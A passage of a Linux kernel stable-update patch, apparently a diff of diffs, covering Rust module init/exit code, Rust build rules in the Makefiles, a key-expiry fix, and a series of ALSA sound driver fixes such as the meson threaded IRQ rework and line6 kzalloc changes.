++                        //   module wrapping it. It is called exactly once by the C side via its
++                        //   unique name,
++                        // - furthermore it is only called after `__{name}_init` has returned `0`
++                        //   (which delegates to `__init`).
++                        unsafe {{ __exit() }}
++                    }}
+ 
+-            #[cfg(not(MODULE))]
+-            #[doc(hidden)]
+-            #[no_mangle]
+-            pub extern \"C\" fn __{name}_exit() {{
+-                __exit()
+-            }}
++                    /// # Safety
++                    ///
++                    /// This function must only be called once.
++                    unsafe fn __init() -> core::ffi::c_int {{
++                        match <{type_} as kernel::Module>::init(&super::super::THIS_MODULE) {{
++                            Ok(m) => {{
++                                // SAFETY: No data race, since `__MOD` can only be accessed by this
++                                // module and there only `__init` and `__exit` access it. These
++                                // functions are only called once and `__exit` cannot be called
++                                // before or during `__init`.
++                                unsafe {{
++                                    __MOD = Some(m);
++                                }}
++                                return 0;
++                            }}
++                            Err(e) => {{
++                                return e.to_errno();
++                            }}
++                        }}
++                    }}
+ 
+-            fn __init() -> core::ffi::c_int {{
+-                match <{type_} as kernel::Module>::init(&THIS_MODULE) {{
+-                    Ok(m) => {{
++                    /// # Safety
++                    ///
++                    /// This function must
++                    /// - only be called once,
++                    /// - be called after `__init` has been called and returned `0`.
++                    unsafe fn __exit() {{
++                        // SAFETY: No data race, since `__MOD` can only be accessed by this module
++                        // and there only `__init` and `__exit` access it. These functions are only
++                        // called once and `__init` was already called.
+                         unsafe {{
+-                            __MOD = Some(m);
++                            // Invokes `drop()` on `__MOD`, which should be used for cleanup.
++                            __MOD = None;
+                         }}
+-                        return 0;
+-                    }}
+-                    Err(e) => {{
+-                        return e.to_kernel_errno();
+                     }}
+-                }}
+-            }}
+ 
+-            fn __exit() {{
+-                unsafe {{
+-                    // Invokes `drop()` on `__MOD`, which should be used for cleanup.
+-                    __MOD = None;
++                    {modinfo}
+                 }}
+             }}
+-
+-            {modinfo}
+         ",
+         type_ = info.type_,
+         name = info.name,
+diff --git a/scripts/Makefile.build b/scripts/Makefile.build
+index 41f3602fc8de7..1827bc1db1e98 100644
+--- a/scripts/Makefile.build
++++ b/scripts/Makefile.build
+@@ -277,17 +277,20 @@ $(obj)/%.lst: $(src)/%.c FORCE
+ 
+ rust_allowed_features := core_ffi_c
+ 
++# `--out-dir` is required to avoid temporaries being created by `rustc` in the
++# current working directory, which may be not accessible in the out-of-tree
++# modules case.
+ rust_common_cmd = \
+ 	RUST_MODFILE=$(modfile) $(RUSTC_OR_CLIPPY) $(rust_flags) \
+ 	-Zallow-features=$(rust_allowed_features) \
+ 	-Zcrate-attr=no_std \
+ 	-Zcrate-attr='feature($(rust_allowed_features))' \
+ 	--extern alloc --extern kernel \
+-	--crate-type rlib --out-dir $(obj) -L $(objtree)/rust/ \
+-	--crate-name $(basename $(notdir $@))
++	--crate-type rlib -L $(objtree)/rust/ \
++	--crate-name $(basename $(notdir $@)) \
++	--out-dir $(dir $@) --emit=dep-info=$(depfile)
+ 
+ rust_handle_depfile = \
+-	mv $(obj)/$(basename $(notdir $@)).d $(depfile); \
+ 	sed -i '/^\#/d' $(depfile)
+ 
+ # `--emit=obj`, `--emit=asm` and `--emit=llvm-ir` imply a single codegen unit
+@@ -300,7 +303,7 @@ rust_handle_depfile = \
+ 
+ quiet_cmd_rustc_o_rs = $(RUSTC_OR_CLIPPY_QUIET) $(quiet_modtag) $@
+       cmd_rustc_o_rs = \
+-	$(rust_common_cmd) --emit=dep-info,obj $<; \
++	$(rust_common_cmd) --emit=obj=$@ $<; \
+ 	$(rust_handle_depfile)
+ 
+ $(obj)/%.o: $(src)/%.rs FORCE
+@@ -308,7 +311,7 @@ $(obj)/%.o: $(src)/%.rs FORCE
+ 
+ quiet_cmd_rustc_rsi_rs = $(RUSTC_OR_CLIPPY_QUIET) $(quiet_modtag) $@
+       cmd_rustc_rsi_rs = \
+-	$(rust_common_cmd) --emit=dep-info -Zunpretty=expanded $< >$@; \
++	$(rust_common_cmd) -Zunpretty=expanded $< >$@; \
+ 	command -v $(RUSTFMT) >/dev/null && $(RUSTFMT) $@; \
+ 	$(rust_handle_depfile)
+ 
+@@ -317,7 +320,7 @@ $(obj)/%.rsi: $(src)/%.rs FORCE
+ 
+ quiet_cmd_rustc_s_rs = $(RUSTC_OR_CLIPPY_QUIET) $(quiet_modtag) $@
+       cmd_rustc_s_rs = \
+-	$(rust_common_cmd) --emit=dep-info,asm $<; \
++	$(rust_common_cmd) --emit=asm=$@ $<; \
+ 	$(rust_handle_depfile)
+ 
+ $(obj)/%.s: $(src)/%.rs FORCE
+@@ -325,7 +328,7 @@ $(obj)/%.s: $(src)/%.rs FORCE
+ 
+ quiet_cmd_rustc_ll_rs = $(RUSTC_OR_CLIPPY_QUIET) $(quiet_modtag) $@
+       cmd_rustc_ll_rs = \
+-	$(rust_common_cmd) --emit=dep-info,llvm-ir $<; \
++	$(rust_common_cmd) --emit=llvm-ir=$@ $<; \
+ 	$(rust_handle_depfile)
+ 
+ $(obj)/%.ll: $(src)/%.rs FORCE
+diff --git a/scripts/Makefile.host b/scripts/Makefile.host
+index da133780b7518..a447c91893de6 100644
+--- a/scripts/Makefile.host
++++ b/scripts/Makefile.host
+@@ -80,25 +80,28 @@ host-rust	:= $(addprefix $(obj)/,$(host-rust))
+ #####
+ # Handle options to gcc. Support building with separate output directory
+ 
+-_hostc_flags   = $(KBUILD_HOSTCFLAGS)   $(HOST_EXTRACFLAGS)   \
++hostc_flags    = -Wp,-MMD,$(depfile) \
++                 $(KBUILD_HOSTCFLAGS) $(HOST_EXTRACFLAGS) \
+                  $(HOSTCFLAGS_$(target-stem).o)
+-_hostcxx_flags = $(KBUILD_HOSTCXXFLAGS) $(HOST_EXTRACXXFLAGS) \
++hostcxx_flags  = -Wp,-MMD,$(depfile) \
++                 $(KBUILD_HOSTCXXFLAGS) $(HOST_EXTRACXXFLAGS) \
+                  $(HOSTCXXFLAGS_$(target-stem).o)
+-_hostrust_flags = $(KBUILD_HOSTRUSTFLAGS) $(HOST_EXTRARUSTFLAGS) \
+-                  $(HOSTRUSTFLAGS_$(target-stem))
++
++# `--out-dir` is required to avoid temporaries being created by `rustc` in the
++# current working directory, which may be not accessible in the out-of-tree
++# modules case.
++hostrust_flags = --out-dir $(dir $@) --emit=dep-info=$(depfile) \
++                 $(KBUILD_HOSTRUSTFLAGS) $(HOST_EXTRARUSTFLAGS) \
++                 $(HOSTRUSTFLAGS_$(target-stem))
+ 
+ # $(objtree)/$(obj) for including generated headers from checkin source files
+ ifeq ($(KBUILD_EXTMOD),)
+ ifdef building_out_of_srctree
+-_hostc_flags   += -I $(objtree)/$(obj)
+-_hostcxx_flags += -I $(objtree)/$(obj)
++hostc_flags   += -I $(objtree)/$(obj)
++hostcxx_flags += -I $(objtree)/$(obj)
+ endif
+ endif
+ 
+-hostc_flags    = -Wp,-MMD,$(depfile) $(_hostc_flags)
+-hostcxx_flags  = -Wp,-MMD,$(depfile) $(_hostcxx_flags)
+-hostrust_flags = $(_hostrust_flags)
+-
+ #####
+ # Compile programs on the host
+ 
+@@ -149,9 +152,7 @@ $(host-cxxobjs): $(obj)/%.o: $(src)/%.cc FORCE
+ # host-rust -> Executable
+ quiet_cmd_host-rust	= HOSTRUSTC $@
+       cmd_host-rust	= \
+-	$(HOSTRUSTC) $(hostrust_flags) --emit=dep-info,link \
+-		--out-dir=$(obj)/ $<; \
+-	mv $(obj)/$(target-stem).d $(depfile); \
++	$(HOSTRUSTC) $(hostrust_flags) --emit=link=$@ $<; \
+ 	sed -i '/^\#/d' $(depfile)
+ $(host-rust): $(obj)/%: $(src)/%.rs FORCE
+ 	$(call if_changed_dep,host-rust)
+diff --git a/scripts/Makefile.modfinal b/scripts/Makefile.modfinal
+index 3af5e5807983a..0faee3a477057 100644
+--- a/scripts/Makefile.modfinal
++++ b/scripts/Makefile.modfinal
+@@ -23,7 +23,7 @@ modname = $(notdir $(@:.mod.o=))
+ part-of-module = y
+ 
+ quiet_cmd_cc_o_c = CC [M]  $@
+-      cmd_cc_o_c = $(CC) $(filter-out $(CC_FLAGS_CFI) $(CFLAGS_GCOV), $(c_flags)) -c -o $@ $<
++      cmd_cc_o_c = $(CC) $(filter-out $(CC_FLAGS_CFI) $(CFLAGS_GCOV) $(CFLAGS_KCSAN), $(c_flags)) -c -o $@ $<
+ 
+ %.mod.o: %.mod.c FORCE
+ 	$(call if_changed_dep,cc_o_c)
+@@ -41,8 +41,6 @@ quiet_cmd_btf_ko = BTF [M] $@
+       cmd_btf_ko = 							\
+ 	if [ ! -f vmlinux ]; then					\
+ 		printf "Skipping BTF generation for %s due to unavailability of vmlinux\n" $@ 1>&2; \
+-	elif [ -n "$(CONFIG_RUST)" ] && $(srctree)/scripts/is_rust_module.sh $@; then 		\
+-		printf "Skipping BTF generation for %s because it's a Rust module\n" $@ 1>&2; \
+ 	else								\
+ 		LLVM_OBJCOPY="$(OBJCOPY)" $(PAHOLE) -J $(PAHOLE_FLAGS) --btf_base vmlinux $@; \
+ 		$(RESOLVE_BTFIDS) -b vmlinux $@; 			\
+diff --git a/scripts/is_rust_module.sh b/scripts/is_rust_module.sh
+deleted file mode 100755
+index 28b3831a7593f..0000000000000
+--- a/scripts/is_rust_module.sh
++++ /dev/null
+@@ -1,16 +0,0 @@
+-#!/bin/sh
+-# SPDX-License-Identifier: GPL-2.0
+-#
+-# is_rust_module.sh module.ko
+-#
+-# Returns `0` if `module.ko` is a Rust module, `1` otherwise.
+-
+-set -e
+-
+-# Using the `16_` prefix ensures other symbols with the same substring
+-# are not picked up (even if it would be unlikely). The last part is
+-# used just in case LLVM decides to use the `.` suffix.
+-#
+-# In the future, checking for the `.comment` section may be another
+-# option, see https://github.com/rust-lang/rust/pull/97550.
+-${NM} "$*" | grep -qE '^[0-9a-fA-F]+ r _R[^[:space:]]+16___IS_RUST_MODULE[^[:space:]]*$'
+diff --git a/security/keys/key.c b/security/keys/key.c
+index e65240641ca57..f2a84d86eab43 100644
+--- a/security/keys/key.c
++++ b/security/keys/key.c
+@@ -464,7 +464,8 @@ static int __key_instantiate_and_link(struct key *key,
+ 			if (authkey)
+ 				key_invalidate(authkey);
+ 
+-			key_set_expiry(key, prep->expiry);
++			if (prep->expiry != TIME64_MAX)
++				key_set_expiry(key, prep->expiry);
+ 		}
+ 	}
+ 
+diff --git a/sound/hda/intel-sdw-acpi.c b/sound/hda/intel-sdw-acpi.c
+index b57d72ea4503f..4e376994bf78b 100644
+--- a/sound/hda/intel-sdw-acpi.c
++++ b/sound/hda/intel-sdw-acpi.c
+@@ -41,6 +41,8 @@ static bool is_link_enabled(struct fwnode_handle *fw_node, u8 idx)
+ 				 "intel-quirk-mask",
+ 				 &quirk_mask);
+ 
++	fwnode_handle_put(link);
++
+ 	if (quirk_mask & SDW_INTEL_QUIRK_MASK_BUS_DISABLE)
+ 		return false;
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 77c40063d63a7..f0b939862a2a6 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9660,6 +9660,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x860f, "HP ZBook 15 G6", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x861f, "HP Elite Dragonfly G1", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x869d, "HP", ALC236_FIXUP_HP_MUTE_LED),
++	SND_PCI_QUIRK(0x103c, 0x86c1, "HP Laptop 15-da3001TU", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x86c7, "HP Envy AiO 32", ALC274_FIXUP_HP_ENVY_GPIO),
+ 	SND_PCI_QUIRK(0x103c, 0x86e7, "HP Spectre x360 15-eb0xxx", ALC285_FIXUP_HP_SPECTRE_X360_EB1),
+ 	SND_PCI_QUIRK(0x103c, 0x86e8, "HP Spectre x360 15-eb0xxx", ALC285_FIXUP_HP_SPECTRE_X360_EB1),
+diff --git a/sound/soc/meson/Kconfig b/sound/soc/meson/Kconfig
+index b93ea33739f29..6458d5dc4902f 100644
+--- a/sound/soc/meson/Kconfig
++++ b/sound/soc/meson/Kconfig
+@@ -99,6 +99,7 @@ config SND_MESON_AXG_PDM
+ 
+ config SND_MESON_CARD_UTILS
+ 	tristate
++	select SND_DYNAMIC_MINORS
+ 
+ config SND_MESON_CODEC_GLUE
+ 	tristate
+diff --git a/sound/soc/meson/axg-card.c b/sound/soc/meson/axg-card.c
+index 2b77010c2c5ce..cbbaa55d92a66 100644
+--- a/sound/soc/meson/axg-card.c
++++ b/sound/soc/meson/axg-card.c
+@@ -320,6 +320,7 @@ static int axg_card_add_link(struct snd_soc_card *card, struct device_node *np,
+ 
+ 	dai_link->cpus = cpu;
+ 	dai_link->num_cpus = 1;
++	dai_link->nonatomic = true;
+ 
+ 	ret = meson_card_parse_dai(card, np, &dai_link->cpus->of_node,
+ 				   &dai_link->cpus->dai_name);
+diff --git a/sound/soc/meson/axg-fifo.c b/sound/soc/meson/axg-fifo.c
+index bccfb770b3391..94b169a5493b5 100644
+--- a/sound/soc/meson/axg-fifo.c
++++ b/sound/soc/meson/axg-fifo.c
+@@ -3,6 +3,7 @@
+ // Copyright (c) 2018 BayLibre, SAS.
+ // Author: Jerome Brunet <jbrunet@baylibre.com>
+ 
++#include <linux/bitfield.h>
+ #include <linux/clk.h>
+ #include <linux/of_irq.h>
+ #include <linux/of_platform.h>
+@@ -145,8 +146,8 @@ int axg_fifo_pcm_hw_params(struct snd_soc_component *component,
+ 	/* Enable irq if necessary  */
+ 	irq_en = runtime->no_period_wakeup ? 0 : FIFO_INT_COUNT_REPEAT;
+ 	regmap_update_bits(fifo->map, FIFO_CTRL0,
+-			   CTRL0_INT_EN(FIFO_INT_COUNT_REPEAT),
+-			   CTRL0_INT_EN(irq_en));
++			   CTRL0_INT_EN,
++			   FIELD_PREP(CTRL0_INT_EN, irq_en));
+ 
+ 	return 0;
+ }
+@@ -176,9 +177,9 @@ int axg_fifo_pcm_hw_free(struct snd_soc_component *component,
+ {
+ 	struct axg_fifo *fifo = axg_fifo_data(ss);
+ 
+-	/* Disable the block count irq */
++	/* Disable irqs */
+ 	regmap_update_bits(fifo->map, FIFO_CTRL0,
+-			   CTRL0_INT_EN(FIFO_INT_COUNT_REPEAT), 0);
++			   CTRL0_INT_EN, 0);
+ 
+ 	return 0;
+ }
+@@ -187,13 +188,13 @@ EXPORT_SYMBOL_GPL(axg_fifo_pcm_hw_free);
+ static void axg_fifo_ack_irq(struct axg_fifo *fifo, u8 mask)
+ {
+ 	regmap_update_bits(fifo->map, FIFO_CTRL1,
+-			   CTRL1_INT_CLR(FIFO_INT_MASK),
+-			   CTRL1_INT_CLR(mask));
++			   CTRL1_INT_CLR,
++			   FIELD_PREP(CTRL1_INT_CLR, mask));
+ 
+ 	/* Clear must also be cleared */
+ 	regmap_update_bits(fifo->map, FIFO_CTRL1,
+-			   CTRL1_INT_CLR(FIFO_INT_MASK),
+-			   0);
++			   CTRL1_INT_CLR,
++			   FIELD_PREP(CTRL1_INT_CLR, 0));
+ }
+ 
+ static irqreturn_t axg_fifo_pcm_irq_block(int irq, void *dev_id)
+@@ -203,18 +204,26 @@ static irqreturn_t axg_fifo_pcm_irq_block(int irq, void *dev_id)
+ 	unsigned int status;
+ 
+ 	regmap_read(fifo->map, FIFO_STATUS1, &status);
++	status = FIELD_GET(STATUS1_INT_STS, status);
++	axg_fifo_ack_irq(fifo, status);
+ 
+-	status = STATUS1_INT_STS(status) & FIFO_INT_MASK;
++	/* Use the thread to call period elapsed on nonatomic links */
+ 	if (status & FIFO_INT_COUNT_REPEAT)
+-		snd_pcm_period_elapsed(ss);
+-	else
+-		dev_dbg(axg_fifo_dev(ss), "unexpected irq - STS 0x%02x\n",
+-			status);
++		return IRQ_WAKE_THREAD;
+ 
+-	/* Ack irqs */
+-	axg_fifo_ack_irq(fifo, status);
++	dev_dbg(axg_fifo_dev(ss), "unexpected irq - STS 0x%02x\n",
++		status);
++
++	return IRQ_NONE;
++}
++
++static irqreturn_t axg_fifo_pcm_irq_block_thread(int irq, void *dev_id)
++{
++	struct snd_pcm_substream *ss = dev_id;
++
++	snd_pcm_period_elapsed(ss);
+ 
+-	return IRQ_RETVAL(status);
++	return IRQ_HANDLED;
+ }
+ 
+ int axg_fifo_pcm_open(struct snd_soc_component *component,
+@@ -242,8 +251,9 @@ int axg_fifo_pcm_open(struct snd_soc_component *component,
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = request_irq(fifo->irq, axg_fifo_pcm_irq_block, 0,
+-			  dev_name(dev), ss);
++	ret = request_threaded_irq(fifo->irq, axg_fifo_pcm_irq_block,
++				   axg_fifo_pcm_irq_block_thread,
++				   IRQF_ONESHOT, dev_name(dev), ss);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -254,15 +264,15 @@ int axg_fifo_pcm_open(struct snd_soc_component *component,
+ 
+ 	/* Setup status2 so it reports the memory pointer */
+ 	regmap_update_bits(fifo->map, FIFO_CTRL1,
+-			   CTRL1_STATUS2_SEL_MASK,
+-			   CTRL1_STATUS2_SEL(STATUS2_SEL_DDR_READ));
++			   CTRL1_STATUS2_SEL,
++			   FIELD_PREP(CTRL1_STATUS2_SEL, STATUS2_SEL_DDR_READ));
+ 
+ 	/* Make sure the dma is initially disabled */
+ 	__dma_enable(fifo, false);
+ 
+ 	/* Disable irqs until params are ready */
+ 	regmap_update_bits(fifo->map, FIFO_CTRL0,
+-			   CTRL0_INT_EN(FIFO_INT_MASK), 0);
++			   CTRL0_INT_EN, 0);
+ 
+ 	/* Clear any pending interrupt */
+ 	axg_fifo_ack_irq(fifo, FIFO_INT_MASK);
+diff --git a/sound/soc/meson/axg-fifo.h b/sound/soc/meson/axg-fifo.h
+index b63acd723c870..5b7d32c37991b 100644
+--- a/sound/soc/meson/axg-fifo.h
++++ b/sound/soc/meson/axg-fifo.h
+@@ -42,21 +42,19 @@ struct snd_soc_pcm_runtime;
+ 
+ #define FIFO_CTRL0			0x00
+ #define  CTRL0_DMA_EN			BIT(31)
+-#define  CTRL0_INT_EN(x)		((x) << 16)
++#define  CTRL0_INT_EN			GENMASK(23, 16)
+ #define  CTRL0_SEL_MASK			GENMASK(2, 0)
+ #define  CTRL0_SEL_SHIFT		0
+ #define FIFO_CTRL1			0x04
+-#define  CTRL1_INT_CLR(x)		((x) << 0)
+-#define  CTRL1_STATUS2_SEL_MASK		GENMASK(11, 8)
+-#define  CTRL1_STATUS2_SEL(x)		((x) << 8)
++#define  CTRL1_INT_CLR			GENMASK(7, 0)
++#define  CTRL1_STATUS2_SEL		GENMASK(11, 8)
+ #define   STATUS2_SEL_DDR_READ		0
+-#define  CTRL1_FRDDR_DEPTH_MASK		GENMASK(31, 24)
+-#define  CTRL1_FRDDR_DEPTH(x)		((x) << 24)
++#define  CTRL1_FRDDR_DEPTH		GENMASK(31, 24)
+ #define FIFO_START_ADDR			0x08
+ #define FIFO_FINISH_ADDR		0x0c
+ #define FIFO_INT_ADDR			0x10
+ #define FIFO_STATUS1			0x14
+-#define  STATUS1_INT_STS(x)		((x) << 0)
++#define  STATUS1_INT_STS		GENMASK(7, 0)
+ #define FIFO_STATUS2			0x18
+ #define FIFO_INIT_ADDR			0x24
+ #define FIFO_CTRL2			0x28
+diff --git a/sound/soc/meson/axg-frddr.c b/sound/soc/meson/axg-frddr.c
+index 61f9d417fd608..f0a9e181ee72a 100644
+--- a/sound/soc/meson/axg-frddr.c
++++ b/sound/soc/meson/axg-frddr.c
+@@ -7,6 +7,7 @@
+  * This driver implements the frontend playback DAI of AXG and G12A based SoCs
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/clk.h>
+ #include <linux/regmap.h>
+ #include <linux/module.h>
+@@ -59,8 +60,8 @@ static int axg_frddr_dai_hw_params(struct snd_pcm_substream *substream,
+ 	/* Trim the FIFO depth if the period is small to improve latency */
+ 	depth = min(period, fifo->depth);
+ 	val = (depth / AXG_FIFO_BURST) - 1;
+-	regmap_update_bits(fifo->map, FIFO_CTRL1, CTRL1_FRDDR_DEPTH_MASK,
+-			   CTRL1_FRDDR_DEPTH(val));
++	regmap_update_bits(fifo->map, FIFO_CTRL1, CTRL1_FRDDR_DEPTH,
++			   FIELD_PREP(CTRL1_FRDDR_DEPTH, val));
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/meson/axg-tdm-interface.c b/sound/soc/meson/axg-tdm-interface.c
+index 028383f949efd..272c3d2d68cb7 100644
+--- a/sound/soc/meson/axg-tdm-interface.c
++++ b/sound/soc/meson/axg-tdm-interface.c
+@@ -351,26 +351,31 @@ static int axg_tdm_iface_hw_params(struct snd_pcm_substream *substream,
+ 	return 0;
+ }
+ 
+-static int axg_tdm_iface_hw_free(struct snd_pcm_substream *substream,
++static int axg_tdm_iface_trigger(struct snd_pcm_substream *substream,
++				 int cmd,
+ 				 struct snd_soc_dai *dai)
+ {
+-	struct axg_tdm_stream *ts = snd_soc_dai_get_dma_data(dai, substream);
++	struct axg_tdm_stream *ts =
++		snd_soc_dai_get_dma_data(dai, substream);
+ 
+-	/* Stop all attached formatters */
+-	axg_tdm_stream_stop(ts);
++	switch (cmd) {
++	case SNDRV_PCM_TRIGGER_START:
++	case SNDRV_PCM_TRIGGER_RESUME:
++	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
++		axg_tdm_stream_start(ts);
++		break;
++	case SNDRV_PCM_TRIGGER_SUSPEND:
++	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
++	case SNDRV_PCM_TRIGGER_STOP:
++		axg_tdm_stream_stop(ts);
++		break;
++	default:
++		return -EINVAL;
++	}
+ 
+ 	return 0;
+ }
+ 
+-static int axg_tdm_iface_prepare(struct snd_pcm_substream *substream,
+-				 struct snd_soc_dai *dai)
+-{
+-	struct axg_tdm_stream *ts = snd_soc_dai_get_dma_data(dai, substream);
+-
+-	/* Force all attached formatters to update */
+-	return axg_tdm_stream_reset(ts);
+-}
+-
+ static int axg_tdm_iface_remove_dai(struct snd_soc_dai *dai)
+ {
+ 	if (dai->capture_dma_data)
+@@ -408,8 +413,7 @@ static const struct snd_soc_dai_ops axg_tdm_iface_ops = {
+ 	.set_fmt	= axg_tdm_iface_set_fmt,
+ 	.startup	= axg_tdm_iface_startup,
+ 	.hw_params	= axg_tdm_iface_hw_params,
+-	.prepare	= axg_tdm_iface_prepare,
+-	.hw_free	= axg_tdm_iface_hw_free,
++	.trigger	= axg_tdm_iface_trigger,
+ };
+ 
+ /* TDM Backend DAIs */
+diff --git a/sound/soc/meson/axg-toddr.c b/sound/soc/meson/axg-toddr.c
+index e9208e74e9659..f875304463e2f 100644
+--- a/sound/soc/meson/axg-toddr.c
++++ b/sound/soc/meson/axg-toddr.c
+@@ -5,6 +5,7 @@
+ 
+ /* This driver implements the frontend capture DAI of AXG based SoCs */
+ 
++#include <linux/bitfield.h>
+ #include <linux/clk.h>
+ #include <linux/regmap.h>
+ #include <linux/module.h>
+@@ -19,12 +20,9 @@
+ #define CTRL0_TODDR_EXT_SIGNED		BIT(29)
+ #define CTRL0_TODDR_PP_MODE		BIT(28)
+ #define CTRL0_TODDR_SYNC_CH		BIT(27)
+-#define CTRL0_TODDR_TYPE_MASK		GENMASK(15, 13)
+-#define CTRL0_TODDR_TYPE(x)		((x) << 13)
+-#define CTRL0_TODDR_MSB_POS_MASK	GENMASK(12, 8)
+-#define CTRL0_TODDR_MSB_POS(x)		((x) << 8)
+-#define CTRL0_TODDR_LSB_POS_MASK	GENMASK(7, 3)
+-#define CTRL0_TODDR_LSB_POS(x)		((x) << 3)
++#define CTRL0_TODDR_TYPE		GENMASK(15, 13)
++#define CTRL0_TODDR_MSB_POS		GENMASK(12, 8)
++#define CTRL0_TODDR_LSB_POS		GENMASK(7, 3)
+ #define CTRL1_TODDR_FORCE_FINISH	BIT(25)
+ #define CTRL1_SEL_SHIFT			28
+ 
+@@ -76,12 +74,12 @@ static int axg_toddr_dai_hw_params(struct snd_pcm_substream *substream,
+ 	width = params_width(params);
+ 
+ 	regmap_update_bits(fifo->map, FIFO_CTRL0,
+-			   CTRL0_TODDR_TYPE_MASK |
+-			   CTRL0_TODDR_MSB_POS_MASK |
+-			   CTRL0_TODDR_LSB_POS_MASK,
+-			   CTRL0_TODDR_TYPE(type) |
+-			   CTRL0_TODDR_MSB_POS(TODDR_MSB_POS) |
+-			   CTRL0_TODDR_LSB_POS(TODDR_MSB_POS - (width - 1)));
++			   CTRL0_TODDR_TYPE |
++			   CTRL0_TODDR_MSB_POS |
++			   CTRL0_TODDR_LSB_POS,
++			   FIELD_PREP(CTRL0_TODDR_TYPE, type) |
++			   FIELD_PREP(CTRL0_TODDR_MSB_POS, TODDR_MSB_POS) |
++			   FIELD_PREP(CTRL0_TODDR_LSB_POS, TODDR_MSB_POS - (width - 1)));
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/tegra/tegra186_dspk.c b/sound/soc/tegra/tegra186_dspk.c
+index a74c980ee7753..d5a74e25371d2 100644
+--- a/sound/soc/tegra/tegra186_dspk.c
++++ b/sound/soc/tegra/tegra186_dspk.c
+@@ -1,8 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0-only
++// SPDX-FileCopyrightText: Copyright (c) 2020-2024 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
+ //
+ // tegra186_dspk.c - Tegra186 DSPK driver
+-//
+-// Copyright (c) 2020 NVIDIA CORPORATION. All rights reserved.
+ 
+ #include <linux/clk.h>
+ #include <linux/device.h>
+@@ -241,14 +240,14 @@ static int tegra186_dspk_hw_params(struct snd_pcm_substream *substream,
+ 		return -EINVAL;
+ 	}
+ 
+-	cif_conf.client_bits = TEGRA_ACIF_BITS_24;
+-
+ 	switch (params_format(params)) {
+ 	case SNDRV_PCM_FORMAT_S16_LE:
+ 		cif_conf.audio_bits = TEGRA_ACIF_BITS_16;
++		cif_conf.client_bits = TEGRA_ACIF_BITS_16;
+ 		break;
+ 	case SNDRV_PCM_FORMAT_S32_LE:
+ 		cif_conf.audio_bits = TEGRA_ACIF_BITS_32;
++		cif_conf.client_bits = TEGRA_ACIF_BITS_24;
+ 		break;
+ 	default:
+ 		dev_err(dev, "unsupported format!\n");
+diff --git a/sound/soc/ti/davinci-mcasp.c b/sound/soc/ti/davinci-mcasp.c
+index ca5d1bb6ac59e..4edf5b27e136b 100644
+--- a/sound/soc/ti/davinci-mcasp.c
++++ b/sound/soc/ti/davinci-mcasp.c
+@@ -2416,12 +2416,6 @@ static int davinci_mcasp_probe(struct platform_device *pdev)
+ 
+ 	mcasp_reparent_fck(pdev);
+ 
+-	ret = devm_snd_soc_register_component(&pdev->dev, &davinci_mcasp_component,
+-					      &davinci_mcasp_dai[mcasp->op_mode], 1);
+-
+-	if (ret != 0)
+-		goto err;
+-
+ 	ret = davinci_mcasp_get_dma_type(mcasp);
+ 	switch (ret) {
+ 	case PCM_EDMA:
+@@ -2448,6 +2442,12 @@ static int davinci_mcasp_probe(struct platform_device *pdev)
+ 		goto err;
+ 	}
+ 
++	ret = devm_snd_soc_register_component(&pdev->dev, &davinci_mcasp_component,
++					      &davinci_mcasp_dai[mcasp->op_mode], 1);
++
++	if (ret != 0)
++		goto err;
++
+ no_audio:
+ 	ret = davinci_mcasp_init_gpiochip(mcasp);
+ 	if (ret) {
+diff --git a/sound/usb/line6/driver.c b/sound/usb/line6/driver.c
+index b67617b68e509..f4437015d43a7 100644
+--- a/sound/usb/line6/driver.c
++++ b/sound/usb/line6/driver.c
+@@ -202,7 +202,7 @@ int line6_send_raw_message_async(struct usb_line6 *line6, const char *buffer,
+ 	struct urb *urb;
+ 
+ 	/* create message: */
+-	msg = kmalloc(sizeof(struct message), GFP_ATOMIC);
++	msg = kzalloc(sizeof(struct message), GFP_ATOMIC);
+ 	if (msg == NULL)
+ 		return -ENOMEM;
+ 
+@@ -688,7 +688,7 @@ static int line6_init_cap_control(struct usb_line6 *line6)
+ 	int ret;
+ 
+ 	/* initialize USB buffers: */
+-	line6->buffer_listen = kmalloc(LINE6_BUFSIZE_LISTEN, GFP_KERNEL);
++	line6->buffer_listen = kzalloc(LINE6_BUFSIZE_LISTEN, GFP_KERNEL);
+ 	if (!line6->buffer_listen)
+ 		return -ENOMEM;
+ 
+@@ -697,7 +697,7 @@ static int line6_init_cap_control(struct usb_line6 *line6)
+ 		return -ENOMEM;
+ 
+ 	if (line6->properties->capabilities & LINE6_CAP_CONTROL_MIDI) {
+-		line6->buffer_message = kmalloc(LINE6_MIDI_MESSAGE_MAXLEN, GFP_KERNEL);
++		line6->buffer_message = kzalloc(LINE6_MIDI_MESSAGE_MAXLEN, GFP_KERNEL);
+ 		if (!line6->buffer_message)
+ 			return -ENOMEM;
+ 
+diff --git a/tools/include/linux/kernel.h b/tools/include/linux/kernel.h
+index 4b0673bf52c2e..07cfad817d539 100644
+--- a/tools/include/linux/kernel.h
++++ b/tools/include/linux/kernel.h
+@@ -8,6 +8,7 @@
+ #include <linux/build_bug.h>
+ #include <linux/compiler.h>
+ #include <linux/math.h>
++#include <linux/panic.h>
+ #include <endian.h>
+ #include <byteswap.h>
+ 
+diff --git a/tools/include/linux/mm.h b/tools/include/linux/mm.h
+index 43be27bcc897d..2f401e8c6c0bb 100644
+--- a/tools/include/linux/mm.h
++++ b/tools/include/linux/mm.h
+@@ -37,4 +37,9 @@ static inline void totalram_pages_add(long count)
+ {
+ }
+ 
++static inline int early_pfn_to_nid(unsigned long pfn)
++{
++	return 0;
++}
++
+ #endif
